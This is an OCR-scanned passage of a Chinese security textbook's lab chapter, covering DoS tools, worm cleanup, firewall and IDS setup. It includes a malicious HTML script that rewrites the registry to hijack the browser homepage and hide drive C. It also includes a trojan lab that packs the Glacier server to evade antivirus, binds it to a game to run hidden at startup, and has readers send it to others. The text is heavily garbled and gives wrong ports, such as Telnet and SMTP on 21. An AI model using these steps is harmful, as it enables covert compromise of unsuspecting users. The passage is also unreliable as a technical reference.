| 检查 状 者 | | 检查 文件 | | 信 便 服务 | | 开始 攻击 | | 停止 攻击 | 
信使 服务 ] 且 示 信息 “也 
手工 命令 : |E5. 可 


无 效 主机 :1 。 利用 率 :850000 [二 二 ER] 
0) 61 EE 100222 60 


图 12-52 攻击 

SYN 攻击 : 源 可 以 随便 输入 ; 目标 下 填 入 要 攻击 的 他 或 域名 ; 源 端 口 1 一 65535 选择 
你 要 攻击 的 一 个 ;目标 端口 ，80 为 攻击 HTTP，21 为 攻击 FTP，23 为 攻击 Telnet，25/110 
为 攻击 E-mail。 

LAND 攻击 : 填 目 标 卫 和 目标 端口 即 可 ( 同 SYN)。 

FakePing 攻击 : 源 IP 随便 填 ， 目标 IP 填 入 要 攻击 的 卫 ， 接 下 来 就 会 有 大 量 的 ICMP 
数据 阻塞 他 的 网 络 。 

狂怒 之 Ping 攻击 : 直接 填 目 标 他 即 可 ， 原 理 同 FakePing。 

单 击 “ 停 止 攻击 ”按钮 可 以 停止 攻击 。 


12.7 ”蠕虫 病毒 分 析 实 训 
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一 、 实 训 目 的 

蠕虫 病毒 的 主要 传播 途径 是 邮件 ， 该 实 训 通 过 对 附件 可 见 型 蠕虫 病毒 和 附件 不 可 见 型 
蠕虫 病毒 进行 分 析 达 到 以 下 几 个 目的 。 

(1) 了 解 邮件 型 病毒 的 基本 特征 和 传播 途径 。 
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(2) 掌握 邮件 型 病毒 的 基本 防范 方法 。 

(3) 通过 实验 对 典型 病毒 进行 分 析 ， 掌 握 邮 件 型 病毒 基本 的 查 杀 技巧 。 

二 、 实 训 环 境 

为 了 保证 病毒 不 感染 用 户 数据 文件 ,本 实 训 需 要 在 安装 了 Windows 2000/XP 系统 的 “ 虚 
拟 机 ”环境 下 进行 。 虚 拟 机 系统 下 需要 安装 Foxmail、Ultraedit 以 及 Office 等 工具 软件 。 

三 、 实 训 内 容 和 步骤 

1. Sircam 病毒 的 清除 

Sircam 病毒 是 一 个 很 典型 的 蠕虫 病毒 ， 其 特点 是 将 被 感染 用 户 的 文件 向 外 发 送 ， 泄 漏 
用 户 的 秘密 和 个 人 隐私 。Sircam 病毒 使 用 双 扩 展 名 技术 实现 自我 隐藏 。 

步骤 一 ”取消 选中 “文件 夹 选 项 ”对 话 框 中 的 “隐藏 已 知 文件 的 扩展 名 ” 复 选 框 ， 观 
察 被 病毒 感染 文件 的 双 扩 展 名 ， 如 图 12-53 所 示 。 


[年 规 要 看 ”| 文件 类 型 | 脱 机 文件 


文件 夹 视图 
地 


高 级 设置 
| 。 回 隐 疗 受 保护 的 操作 系统 文件 推荐 ) 
| ”局 隐 营 文件 和 文件 夹 
〇 不 显 示 陷 藏 的 文件 和 文件 夹 
EE 显示 所 有 文件 和 六 件 天 

站 类 名 


示 加 密 : 
口 在 标题 栏 显示 完整 路 径 
口 在 单独 的 进程 中 打开 文件 夹 窗口 
口 在 登录 时 还 原 上 一 个 文件 夹 窗口 


示 完 整 路 径 
_ 回 在 文件 夹 提 示 中 显示 文件 大 小 信息 ba 


还 原 为 默认 值 @) 


[应 用 (@&) 


12-53 “文件 夹 选项 ”对 话 框 的 “查看 ”选项 卡 

步骤 二 用 UltraEdit 软件 打开 这 个 带 毒 文 件 。 

步骤 三 ”查找 被 病毒 感染 之 前 文件 的 头 标志 。 

步骤 四 “删除 头 标 志 之 前 的 所 有 病毒 体 ， 然 后 保存 文件 。 

步骤 五 ”打开 已 经 挽救 的 文件 ， 观 察 实验 效果 。 

2. 查看 隐藏 在 邮件 中 的 文件 

很 多 蠕虫 病毒 都 将 病毒 文件 隐藏 在 邮件 正文 中 ， 并 且 利 用 邮件 系统 的 漏洞 ， 使 用 户 在 
单 击 该 邮件 时 就 会 发 作 。 例 如 ， 尼 姆 达 病 毒 就 是 采用 这 种 隐藏 方式 。 


@ 
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步骤 一 ”打开 Foxmail 中 的 病毒 邮件 。 

步骤 二 ”选择 详细 信息 查看 。 

步骤 三 ”查看 隐藏 文件 的 特征 。 

步骤 四 “运行 该 邮件 病毒 。 

步骤 五 用 UltraEdit 软件 打开 病毒 邮件 文件 和 正常 邮件 文件 。 

步骤 六 ”把 带 毒 邮件 的 病毒 体 部 分 删除 ， 并 用 正常 邮件 文件 的 头 信息 替换 带 毒 邮件 的 
头 信息 。 


12.8 网 页 脚本 病毒 分 析 实 训 


一 、 实 训 目 的 

了 解 脚本 及 恶意 网 页 的 语言 基础 及 传播 手段 ， 掌握 脚本 及 恶意 网 页 的 基本 防范 方法 和 
手工 处 理 技巧 ， 通 过 实验 中 对 典型 脚本 病毒 及 恶意 网 页 的 分 析 ， 掌 握 判断 未 知 脚本 病毒 及 
其 处 理 的 能 力 。 


二 、 实 训 环 境 


(1) 操作 系统 平台 : Windows 2000/XP。 
(2) 脚本 编辑 工具 : Edit Plus 。 


三 、 实 训 内 容 和 步骤 
1. 注册 表 恶 意 修改 


步骤 一 ”打开 Edit Plus 脚本 编辑 工具 ， 编 辑 如 下 脚本 内 容 ， 把 文件 保存 为 “修改 注册 
表 .htm”。 
<head> 


<title> 测 试 脚本 </title> 
</head> 


<body> 
<OBJECT classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B id=wsh> 
</OBJECT><SCRIPT> 


// 以 下 内 容 为 对 注册 表 的 修改 
// 修 改 IE 中 的 主页 设置 为 www.123456.com 


wsh.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main 
\\Start Page", "http://www.123456.com"); 


// 隐 藏 驱动 器 C 

wsh.RegWrite ("HKCU\Software\\Microsoft\\Windows\\CurrentVersion 
\\Policies\\Explorer\\NoDrives","00000004", "REG DWORD"); 
</script> 


册 UU EPE 


</body> 
</html> 


步骤 二 ”运行 “修改 注册 表 .htm” 文 件 。 
步骤 三 ”打开 “Intemet 选项 ”对 话 框 ， 查 看 主页 地 址 ， 如 图 12-54 所 示 。 


Internet 选项 


隐私 “| 内容 【连接 | 程序 【高 级 


[使 用 当前 页 C) 】[ 使 用 默认 页 四 ) | [使 用 空白 页 @) | 


Internet 临时 文件 
内 bs 本 的 Internet 页 存 针 在 特定 的 文件 买 中 +， 这 样 可 以 


ceo 中] 网 隐 文件 中. ] [设置 名 ] 


历史 记录 
EE ot tn 全 有 已 沪 问 页 的 娠 接 ， 可 使 用 户 忆 


网 页 保存 在 历史 记录 中 的 天 数 人 ); |20 客 | 清除 历史 记录 0D 


[ 开 色 Q@..，] [字体 如 ..，] [语言 由. ] 随 助 功能 四 .| 


取消 ”] [应用 ] 


图 12-54 “Internet 选项 ”对 话 框 
步骤 四 “注销 系统 ， 然 后 双击 “我 的 电脑 ”查看 C 盘 是 否 被 隐藏 ， 如 图 12-55 所 示 。 


文件 中 ”编辑 外 查看 WW) 转 到 @ 收 诚 ) 天助 中 
i 


本 目 可 以 查看 其 说 


12-55 “我 的 电脑 ”窗口 
2. 脚本 防护 处 理 及 反 修 改 
对 于 被 脚本 及 恶意 网 页 造成 的 破坏 ， 我 们 可 以 通过 在 注册 表 中 删除 不 需要 的 键 值 和 修 
改 被 算 改 的 键 值 的 手段 进行 修复 ， 在 此 不 作 介绍 。 
通过 禁用 WSH， 可 以 达到 彻底 禁止 脚本 运行 的 效果 。 
步骤 一 ”双击 “我 的 电脑 ”图 标 ， 然 后 选择 “工具 ”|“ 文 件 夹 选项 ”命令 。 
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步骤 二 ”在 “文件 夹 选项 ” 对话 框 中 , 切换 到 “文件 类 型 ”选项 卡 , 找到 VBS VBScript 
Script File 选项 ， 如 图 12-56 所 示 。 


常规 | 查看 | 文件 闫 型 | 脱 机 文件 
已 注册 的 文件 类 型 加 ) 


扩展 名 文件 类 型 
介 wmc vpc 文件 


人 VBScript Encoded Script Pile 


wr 。 vCard Tile 
国 ws vcaenasr File 
蕊 cz vc2 文件 


REvrn vrn 立志 | 


新 建 虽 开除 om) ] 


“YES” 扩展 名 的 详细 信息 
打开 方式 图. 晶 crosoft CD) Windows [更改 C) 


扩展 : VBS” te WyBScript Seript File 
到" 六 所 有 凡响 “VBScript Script File” 文件 的 设 


高 级 人 


图 12-56 “文件 类 型 ”选项 卡 
步骤 三 ” 单 击 “ 删 除 ” 按 钮 ， 最 后 单 击 “确定 ”按钮 。 


12.9 木马 的 防 杀 与 种 植 实 训 


一 、 实 训 目 的 
了 解 木马 防 杀 技术 、 木 马 种 植 技术 ， 提 高 网 络 安 全 意识 ， 实 现 安全 的 网 络 共享 资源 。 
二 、 实 训 环 境 


(1) 冰河 木马 V8.4。 

(2) 加 壳 工具 NCPH。 

(3) 修改 图 标 工具 Iconchanger。 

(4) 文件 合并 工具 Deception Binder。 

三 、 实 训 内 容 和 步骤 

步骤 一 ”配置 冰河 木马 服务 端 。 

双击 G_CLIENT.EXE 文件 ， 打 开 冰 河 客户 端 ， 如 图 12-57 所 示 。 注 意 千 万 不 要 双击 
G_SERVER.EXE 文件 。 

选择 “设置 ” |“ 配置 服务 器 ”程序 ， 打 开 “ 服 务 器 配置 ”对 话 框 ， 进 行 基本 设置 ， 如 
图 12-58 所 示 。 
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丈 河 V8. 4 [NEWFUN 专 版 ] 司 
文件 [E] 。 编 村 ] 。 该 考区] 。 帮助 [B 
ER 
当前 这 接 : [Localost =] Bo:hes Waos$:[ 可 用 
司 文 竺 至 吴 | 芭 命 人 控制 人 | 


EYE 


:Sa Neh: 


Eis 访问 口令 : | 


关 丰 尖 下: 世 开 TTCTTICTTTTCCTRCTTYCC 


和 


: fe 厂 自动 删除 安装 文件 厅 禁止 自动 拨号 


12-58 “服务 器 配置 ”对 话 框 


单 击 “ 确 定 ” 按 钮 后 ， 生 成 服务 器 端 程序 。 

步 又 二 ” 免 杀 木马 制作 一 一 木马 加 这。 

首先 ， 对 上 一 步 生成 的 木马 服务 器 端 程序 进行 病毒 扫描 。 

然后 ， 打 开 ncphpack.exe 程序 ， 单 击 “ 打 开 ” 按 钮 选择 木马 服务 器 端 程序 ， 如 图 12-59 
所 示 ， 单 击 “ 保 护 ” 按 钮 ， 完 成 对 木马 服务 器 端的 加 过 保护 。 

最 后 ， 对 加 壳 后 的 木马 服务 器 端 程序 进行 病毒 扫描 。 

步骤 三 ”种 植木 马 

把 上 一 步 生成 的 木马 服务 器 端 与 一 个 exe 文件 合并 。 打 开 deception.exe 文件 ， 单 击 第 

-个 set 按钮 , 指定 一 个 exe 文件 的 路 径 , 比如 游戏 程序 “五 子 连珠 .exe ”的 路 径 , 如 图 12-60 

所 示 。 单 击 第 二 个 set 按钮 ， 指 定 木 马 服务 端 程序 “G-SERVER.EXE” 的 路 径 。 设 置 运行 
选项 。 

Deception 中 有 3 个 运行 选项 ， 说 明 如 下 。 

。 ”Run Hidden: 隐藏 运行 。 
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® 


。 ”Add to Registry: 加 入 注册 表 ， 使 木马 服务 端 随 计算 机 启动 自动 运行 。 
。 ”Fake Error: 弹出 错误 消息 。 
这 里 读者 可 以 任意 选择 ， 尝 试 每 一 项 的 功能 。 


12-59 ”选择 木马 服务 器 端 程序 图 12-60 ”Deception 程序 运行 界面 


最 后 单 击 Bind 按钮 进行 捆绑 操纵 ， 生 成 捆绑 文件 。 

通过 以 上 过 程 ， 捆 绑 了 木马 和 小 游戏 的 新 文件 BINDED.EXE 就 生成 了 。 然 后 把 该 文件 
名 改 成 “五 子 连珠 .exe”。 把 该 文件 传 给 其 他 人 ， 并 运行 。 那 么 对 方 看 到 的 只 是 小 游戏 “五 
子 连珠 ”的 界面 ， 而 木马 服务 端 程序 已 经 悄然 运行 了 。 

木马 服务 端 除了 可 以 与 exe 文件 绑 定 之 外 ， 还 可 以 与 文本 文件 、 图 片 文件 等 进行 绑 定 ， 
实现 隐藏 自己 的 目的 ， 过 程 与 上 面 类 似 ， 在 此 不 再 袭 述 。 


12.10 WinRoute 的 安装 与 配置 实 训 


一 、 实 训 目 的 

WinRoute 是 一 个 集 路 由 器 、DHCP 服务 器 、DNS 服务 器 、NAT、 防 火 墙 于 一 身 的 代 
理 服务 器 软件 , 同时 它 还 是 一 个 可 以 应 用 于 局 域 网 内 部 的 邮件 服务 器 软件 , 所 以 WinRoute 
不 但 可 以 实现 局 域 网 内 的 所 有 微机 共享 一 个 Intemet 连接 (包括 Modem、ISDN、XDSL、 
DDN 等 )， 而 且 可 以 实现 局 域 网 内 部 的 邮件 管理 ， 实 现 局 域 网 与 Internet 之 间 的 邮件 交换 。 

通过 本 实 训 ， 读 者 要 了 解 Windows 环境 下 WinRoute 的 安装 与 配置 ， 同 时 增强 对 防火 
当 技 术 的 认识 。 

二 、 实 训 环 境 

三 台 安 装 有 Windows 2000/XP/2003 的 计算 机 ， 其 中 一 台 安 装 WinRoute 软件 ， 计 算 机 
之 间 通 过 交换 机 相连 ， 组 成 局 域 网 。 也 可 用 虚拟 机 组 建 实 训 环境 。 

三 、 实 训 内 容 和 步骤 

1. WinRoute 的 安装 

步骤 一 ”安装 过 程 中 ， 程 序 安装 目录 的 选择 如 图 12-61 所 示 ， 单 击 “ 下 一 步 ” 按 钮 。 

步骤 二 在 Initial configuration 对 话 框 中 ， 选 中 Network adapter 单 选 按钮 ， 并 指明 外 
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网 网 卡 ， 如 图 12-62 所 示 ， 单 击 OK 按钮 。 


一 Destination Diecton 


[EProgam Fies\winRoute Pro Browse 


图 12-61 程序 安装 目录 的 选择 
步骤 三 ”重启 系统 ， 完 成 安装 ， 如 图 12-63 所 示 。 
Initial _configuration [Ea 


To secure your local nctwork please select your emt 
onnection below NAT wil be automaticaly enabled 
connection 


Setup Wote 


广 DiahUp Connection [phone ine, IDSN, .) i | 
0 complete installation you b your Computer, 


他 Network adapter (xDSL. cable modem, satellte ...] 
Select network adapter connected to the Intemet 他 Restart now 
| wil restart the computer |ater 


DR) 


12-62 “Initial configuration 对 话 框 12-63 ”完成 安装 


2. 设置 DHCP 服务 器 


步骤 一 ”从 菜单 栏 中 选择 Settings | DHCP Server 命令 ,程序 将 会 弹出 一 个 如 图 12-64 
所 示 的 对 话 框 。 

步骤 二 在 弹出 的 对 话 框 中 首先 应 该 选中 DHCP Server enabled 复 选 框 , 接着 用 鼠标 选 
中 Default Options( 默 认 选项 ) 后 ， 单 击 Edit 按钮 。 程 序 将 打开 Change Default Options( 修 改 
默认 选项 ) 对 话 框 ， 如 图 12-65 所 示 。 该 对 话 框 的 Options 选项 组 共 提供 了 4 个 复 选 框 ， 如 
果 选 中 DNS Server 复 选 框 表示 启用 了 域名 转换 功能 ， 同 时 用 户 可 以 在 右边 的 Specify 选项 
组 中 输入 因特网 服务 商 提 供 的 DNS 服务 器 地 址 ， 另 外 用 户 还 必须 选中 Lease Time 复 选 框 
来 指定 人 P 地 址 的 释放 时 间 。 对 默认 选项 设置 修改 后 ， 单 击 OK 按钮 返回 如 图 12-65 所 示 的 

步骤 三 ”在 图 12-64 中 ， 单 击 Advanced( 高 级 ) 按 钮 ， 弹 出 如 图 12-66 所 示 的 对 话 框 。 

步骤 四 “在 弹出 的 对 话 框 中 选中 第 一 个 复 选 框 ， 表 示 为 客户 机 在 启动 时 使 用 动态 人 P 
表 ， 这 样 客 户 机 重新 启动 时 就 不 会 占用 几 个 他 地址 , 第 二 个 复 选 框 表示 客户 机 将 自动 从 远 
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程 服务 器 上 获得 动态 的 全 地 址 。 单 击 OK 按钮 。 


图 12-65 ”修改 默认 选项 图 12-66 Advanced 对 话 框 


步骤 五 ” 单 击 图 12-64 中 的 New Scope 按钮 ， 在 弹出 的 对 话 框 中 设置 一 个 DHCP 服务 
器 上 的 动态 卫 地 址 分 配 范围 ， 用 户 可 以 在 From 文本 框 中 填 入 一 个 起 始 地 址 ， 在 To 文本 
框 中 填 入 结束 地 址 ， 在 Mask 文本 框 中 输入 掩 码 的 了 地 址 ， 通 常 为 255.255.255.0， 设 置 后 
单 击 OK 按钮 就 完成 了 DHCP 有 关 的 参数 设置 工作 ， 如 图 12-67 所 示 。 


3. 设置 代理 服务 器 


步 又 一 ”在 菜单 栏 中 选择 Settings | Proxy Server 命令 , 程序 会 打开 一 个 如 图 12-68 所 示 
的 参数 设置 框 。 

步骤 二 ”General( 一 般 设 置 )。 程 序 默 认 的 端口 号 是 3128， 为 了 安全 起 见 ， 建 议 把 它 改 
掉 。 当 起 用 代理 服务 器 功能 时 ， 还 有 一 项 设置 可 以 让 用 户 来 选择 ， 那 就 是 用 户 是 否 想 对 代 
理 服务 器 访问 过 的 URL 进行 日 志 记录 ， 选 中 Log access to proxy server 复 选 框 ， 对 访问 代 
理 服务 器 的 信息 进行 记录 ， 如 图 12-69 所 示 。 
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General |Cache | Tine-to-Live | Access | dvanced| 
Boxy Server Enabi 


Ecy Eroxy P126 


厂 Log access to proxy server, 


To use the proxy server, browser on the client PCs in a 
Miress Seope a be setup to i thr， 


ough the 
ED Er Server 1s the adbess of Vinhoute’s 了 in the ocel network 
-EE EAE and the port is the value configured above (3128 by 


Mesk 55. 255. 255.0 


IDms Siw er 
Cuncel 职 消 再 用 
12-67 Add Scope 对 话 框 图 12-68 ”Proxy Server Settings 对 话 框 


Genersl |Cache | Tine-to-Live | hccess | hdvanced| 
广 j Proxy Server Enabl 


cy Broxy asd] 


1 Log access to proxy server 


To use the proxy server, browser on the client FCs in the 
local network have to be setup to connect throueh the proxy 
server is the address of WinRoute’s PC in the local network 
and the port is the value configured sbove (3128 by 


wn | enw | 
图 12-69 ”General 选项 卡 


步骤 三 ”切换 到 Access 选项 卡 ， 在 Access List( 访 问 列表 ) 选 项 组 中 可 以 通过 Insert 按 
钮 来 插入 一 个 URL， 程 序 将 会 弹出 一 个 如 图 12-70 所 示 的 对 话 框 。 可 单 击 Edit 按钮 来 修改 
已 经 存在 的 URL， 可 单 击 Remove 按钮 来 删除 URL。 在 Access 选项 组 中 用 户 可 以 对 指定 
的 URL 进行 限制 访问 , 通过 中 间 的 按钮 Add 来 允许 某 些 用 户 可 以 访问 , 通过 Remove 按钮 
来 拒绝 某 些 用 户 访 问 。 在 这 里 要 提醒 大 家 的 是 ，Admin 组 成 员 是 不 受 代理 服务 器 的 任何 访 
问 限制 的 ， 如 果 不 想 代理 服务 器 起 作用 ， 就 不 要 设 任何 帐号 ， 并 且 利用 通配符 “* ”限制 访 
问 任何 站 点 。 
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图 12-70 ”Access 选项 卡 

4. 设置 数据 包 过 滤 

选择 Settings | Advanced | Packet Filter 命令 ， 程 序 将 会 弹出 一 个 如 图 12-71 所 示 的 对 话 
框 ， 在 Incoming 选项 卡 中 单 击 连 接 到 Internet 的 选项 ， 如 果 是 用 网 卡 专线 的 ， 则 单 击 带 网 
卡 的 选项 ， 如 果 是 拨号 的 ， 则 设置 拨号 的 选项 如 Dial in adapter， 双 击 它 会 下 拉 出 一 个 mule 
规则 ， 再 双击 会 弹出 一 个 对 话 框 ， 如 图 12-72 所 示 。 里 面 有 Source、Destination 和 Action 
三 个 选项 组 。 在 Source 和 Destination 选项 组 的 Type 下 拉 列 表 可 选择 需要 限制 或 者 允许 (来 
自 源 和 目标 地 址 ) 接 收 的 数据 包 的 他 地 址 和 下 组 ,Action 选 项 组 定义 了 3 个 单 选 按钮 , Permit 
表示 允许 接纳 数据 包 Drop 表示 停止 接收 数据 包 ， 但 能 够 将 信息 保存 下 来 ， Deny 表示 拒 
绝 数据 包 的 接收 。 


celerated AND 了 C 了 et 大 daptel 
由 到 yware nltd AND PCHet te 
Bial in adepter 
linel 
Any interface 


图 12-71 Incoming 选项 卡 


Add Item 


图 12-72 Add ltem 对 话 框 
5. 客户 机 设置 


具体 方法 如 下 : 在 客户 机 (以 Windows XP 为 例 ) 桌 面 选 择 “ 网 上 邻居 ”选项 并 右 击 ， 在 
弹出 的 快捷 菜单 中 选择 “属性 ”命令 ， 弹 出 “属性 ”对 话 框 ， 在 对 话 框 中 选择 TCP/IP 再 单 
击 “ 属 性 ”按钮 ， 弹 出 属性 对 话 框 ， 在 “IP 地 址 ”文本 框 中 填 入 已 安装 好 WinRoute 的 计 


算 机 的 耳 地 址 ， 在 “默认 网 关 ” 文 本 框 中 填 入 网 关 地 址 ， 本 文 以 192.168.0.1 为 例 ， 如 
图 12-73 所 示 。 


t 协议 (ITCP/IP) 属性 


ED 


人 自动 获得 IT 地 址 @) 
回合 用 下 面 的 IP 地 址 G): - 

TP 地 址 台 ): 192 .168 .0 .2 
子 网 掩 码 D) ; 255 .255 .255 . 0 


默认 网 关 @): 192 .168 .0 .1 


站 自动 获 祷 DNS 服务 器 地 址 B) 


| “加 使用 下 面 的 DIS 服务 器 地 址 加) : 
首选 DIS 服务 器 下); 


备用 DNS 服务器); 


图 12-73 “Intenet 协议 (TCP/IP) 属 性 ”对 话 框 
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12.11 使 用 lpchains 构建 Linux 下 的 防火 墙 实 训 


一 、 实 训 目 的 
实现 防火 墙 的 策略 一 般 有 两 种 。 在 第 一 种 方式 下 ， 首 先 允许 所 有 的 包 ， 然 后 再 禁止 有 


危险 的 包 通 过 防火 墙 ， 第 二 种 方式 则 相反 ， 首 先 禁止 所 有 的 包 ， 然 后 再 根据 所 需要 的 服务 
允许 特定 的 包 通 过 防火 墙 。 相 比较 而 言 ,第 二 种 方式 更 能 保证 网 络 的 安全 性 。 通过 本 实 训 ， 
使 学 生 熟 悉 采 用 第 二 种 方式 构建 防火 增 系 统 。 


二 、 实 训 环 境 
网 络 拓扑 如 图 12-74 所 示 。 


FireWall 


(Linux 系统 ) 


12-74 ”实验 网 络 拓扑 图 


内 部 网 络 地 址 为 : 198.168.80.0。 

eth0: 198.199.37.254。 

ethl: 198.168.80.254。 

并 且 假 设 在 内 部 网 中 存在 以 下 服务 器 。 

DNS 服务 器 : dns.yourdomain.com， 由 firewall 兼任 。 
WWW 服务 器 : www.yourdomain.com，198.168.80.11。 
FTP 服务 器 : ftp.yourdomain.com，198.168.80.12。 
BBS 服务 器 : bbs.yourdomain.com，198.168.80.13。 
E-mail 服务 器 : mail.yourdomain.com，198.168.80.14。 


三 、 实 训 内 容 和 步骤 


步骤 一 ”建立 frewall 文件 。 
在 /etc/re.d/ 目 录 下 用 touch 命令 建立 firewall 文件 ， 执 行 chmod utx firewll 命令 更 改 文 


件 属性 , 编辑 /etc/re.d/re.local 文件 , 在 末尾 加 上 /etc/re.d/firewall 以 确保 开机 时 能 自动 执行 该 
脚本 。 


步骤 二 ”刷新 所 有 的 ipchains。 使 用 的 命令 及 运行 结果 如 下 。 
#!/bin/sh 
echo "Starting ipchains rules..." 


#Refresh all chains 


/sbin/ipchains -F 


EN 


I 


步骤 三 设置 WWW 包 过 滤 。 

说 明 : WWW 端口 为 80， 采 用 TCP 或 UDP 协议 。 

规则 : ethl1， 允 许 所 有 来 自 Intranet 的 WWW 包 ; eth0， 仅 允许 目的 为 内 部 网 WWW 服 
务 器 的 包 。 


#Define HTTP packets 


#Allow WwW request packets from Internet clients to www servers 


/sbin/ipchains -A input -p tcp -s 0.0.0.0/0 1024: -d 198.168.80.11/32 www 


-i 


eth0 -j 
ACCEPT 


/sbin/ipchains -A input -p udp -s 0.0.0.0/0 1024: -d 198.168.80.11/32 


wwW -i eth0 -j 


ACCEPT 
#Allow response from Intranet www servers to request Internet clients 


/sbin/ipchains -A input -p tcp -s 198.168.80.11/32 www -d 0.0.0.0/0 1024: 
ethl -j 


ACCEPT 


/sbin/ipchains -A input -p udp -s 198.168.80.11/32 www -d 0.0.0.0/0 1024: 
ethl -j 


ACCEPT 
#Al1lOw www request packets from Intranet clients to Internet WwW servers 


/sbin/ipchains -A input -p tcp -s 198.168.80.0/24 1024: -d 0.0.0.0/0 www 
ethl -j ACCEPT 


/sbin/ipchains -A input -p udp -s 198.168.80.0/24 1024: -d 0.0.0.0/0 www 
ethl -j ACCEPT 


# 有 AL1ow www response packets from Internet www servers to Intranet clients 


/sbin/ipchains -A input -p tcp -s 0.0.0.0/0 www -d 198.168.80.0/24 1024: 
eth0 -j ACCEPT 


/sbin/ipchains -A input -p udp -s 0.0.0.0/0 www -d 198.168.80.0/24 1024: 
eth0 -j ACCEPT 


@ 
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步骤 四 ”设置 FTP 包 过 滤 。 

说 明 : FTP 端口 为 21，ftp-data 端口 为 20， 均 采用 TCP 协议 。 

规则 : eth1， 人 允许 所 有 来 自 Intranet 的 FTP、ftp-data 包 ; eth0， 仅 允许 目的 为 内 部 网 
FTP 服务 器 的 包 。 


#Define FTP packets 
#Allow ftp request packets from Internet clients to Intranet ftp server 


/sbin/ipchains -A input -p tcp -s 0.0.0.0/0 1024: -d 198.168.80.12/32 
ftp -i eth0 -j 


ACCEPT 


/sbin/ipchains -A input -p tcp -s 0.0.0.0/0 1024: -d 198.168.80.12/32 
ftp-data -i eth0 -j 


ACCEPT 
#Allow ftp response packets from Intranet ftp server to Internet clients 


/sbin/ipchains -A input -p tcp -s 198.168.80.12/32 ftp -d 0.0.0.0/0 1024: 
-i ethl -j 


ACCEPT 


/sbin/ipchains -A input -p tcp -s 198.168.80.12/32 ftp-data -d 0.0.0.0/0 
L024 = 二 NT = 


ACCEPT 
#Allow ftp request packets from Intranet clients to Internet ftp servers 


/sbin/ipchains -A input -p tcp -s 198.168.80.0/24 1024: -d 0.0.0.0/0 ftp 
-i ethl -j ACCEPT 


/sbin/ipchains -A input -p tcp -s 198.168.80.0/24 1024: -d 0.0.0.0/0 
ftp-data -i ethl -j 


ACCEPT 


#Allow ftp response packets from Internet ftp servers to Intranet clients 


潼 汀 车 拆 壮 ”全 涟 开 如 村 才 到 沼 到 


/sbin/ipchains -A input -p tcp -s 0.0.0.0/0 ftp -d 198.168.80.0/24 1024: 
-i eth0 -j ACCEPT 


/sbin/ipchains -A input -p tcp -s 0.0.0.0/0 ftp-data -d 198.168.80.0/24 
1024: -i eth0 -j 


EE 


ACCEPT 
步骤 五 ”设置 Telnet 包 过 滤 。 
说 明 : Telnet 端口 为 21， 采 用 TCP 协议 。 
规则 : eth1， 人 允许 所 有 来 自 Intranet 的 telnet 包 ; eth0， 仅 允许 目的 为 bbs 服务 器 的 包 ; 
为 了 提高 网 络 安全 性 ， 禁 止 所 有 对 firewall 的 Telnet 请 求 。 


#Define telnet packets 
#Allow telnet request packets from Internet clients to Intranet bbs server 


/sbin/ipchains -A input -p tcp -s 0.0.0.0/0 1024: -d 198.168.80.13/32 
telnet -i eth0 -]j ACCEPT 


#Allow telnet response packets from bbs server to Internet clients 


/sbin/ipchains -A input -p tcp -s 198.168.80.13/32 telnet -d 0.0.0.0/0 
1024: -i ethl -j ACCEPT 


#Allow telnet request packets from Intranet clients to Internet telnet 
servers 


/sbin/ipchains -A input -p tcp -s 198.168.80.0/24 1024: -d 0.0.0.0/0 
telnet -i ethl -j 


ACCEPT 


#Allow telent response packets from Internet telnet servers to Intranet 
clients 


/sbin/ipchains -A input -p tcp -s 0.0.0.0/0 telnet -d 198.168.80.0/24 
1024: -i eth0 =3 


ACCEPT 


步骤 六 ”设置 SMTP 包 过 滤 。 

说 明 : SMTP 端口 为 21， 采 用 TCP 协议 。 

规则 :ethl1， 人 允许 所 有 来 自 Intranet 的 smtp 包 ; eth0， 仅 允许 目的 为 E-mail 服务 器 的 
SMTP 请 求 。 

#Define smtp packets 

#Allow smtp request packets from Internet smtp servers to Intranet E-mail 


server 
/sbin/ipchains -A input -p tcp -s 0.0.0.0/0 1024: — 


©® 
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12.12 ”CA Session Wall 的 安装 与 配置 实 训 


12.12.1 CA Session Wall 的 实时 检测 实 训 

一 、 实 训 目 的 

A 公司 的 入 侵 检 测 软件 Session Wall-3 提供 了 友好 的 界面 ， 可 用 来 控制 并 查看 各 种 网 
络 数据 ， 同 时 可 以 对 数据 进行 统计 ， 并 将 统计 结果 显示 出 来 。 本 实 训 的 目的 是 了 解 Session 
Wall 的 强大 功能 以 及 IDS 在 网 络 中 的 地 位 与 作用 ， 并 学 会 使 用 Session Wall-3 进行 实时 安 
全 检测 。 

二 、 实 训 环 境 

两 台 预 装 Windows 2000 服务 器 版 或 标准 版 的 计算 机 , 计算 机 之 间 通 过 网 络 相 连 。 也 可 
用 虚拟 机 组 建 实 训 环 境 。 

三 、 实 训 内 容 和 步骤 

1. 准备 工作 

安装 Session Wall-3， 注 意 如 果 在 安装 时 选择 了 “Session Wall-3 作为 服务 启动 ”， 则 
系统 每 次 启动 时 都 要 启动 Session Wall-3 。 

2. 实 训 内 容 和 步骤 

步骤 一 ”启动 Session Wall-3， 启 动 后 看 到 如 图 12-75 所 示 的 界面 。 


办 口 司 | 鱼 | 丰 | 人 区 | A 生 | 下 向 号 | 四 民 上 1 


@ Minking toolbar button ndicates now activity. Click the button to see the alerts 


匡 Service (LDP) rr 

UDpxe7 (68) BROADCAST nakshoad 187 54230 

NETBIOS Datagram Service (UDP) 。 BROADCAST wzksNond 5 14,320 

EE Datagram Service (UDP) BROADCAST 192.168.1.2 se 12,660 

NETBIOS Name Service UDP) BROADCAST 192.168.1.2 195 17940 i 

问 时 NRECTOACT ,Recent civiy /( Dier sevicer & 可 
frracng octve 4 


图 12-75 启动 Session Wall-3 


由 7 


步骤 二 ”打开 PingPro, 在 PingPro 中 单 击 Scan 按钮 , 配置 Ping Pro 检测 合作 伙伴 的 系 
统 。 也 可 采用 其 他 的 攻击 方法 (如 SYN Flood 攻击 和 WinNuke 拒绝 服务 攻击 ) 向 合作 伙伴 发 
起 攻击 。 

步骤 三 ”由 于 合作 双方 进行 同样 的 练习 ， 可 以 从 Session Wall 菜单 栏 下 的 显示 框 中 看 
到 指示 灯 在 闪烁 和 流量 增加 的 信息 ， 如 图 12-76 所 示 。 


:= Computer Associates SessionWall-3 


Data Edt Yew Functions Settings Help 
合 口 加 | 鲜 | 下 | 好 | 忆 4 仿 | 本 名 号 


RI[S ® 
The URL® ossociatod with cach catogory can be updated doctly from the viewer or on » weckly basis using he subscription = 
option. All directly entered URLs are saved after subscription updak 


Service 
E Total X 4 四 
哩 UDP:67 机 。 
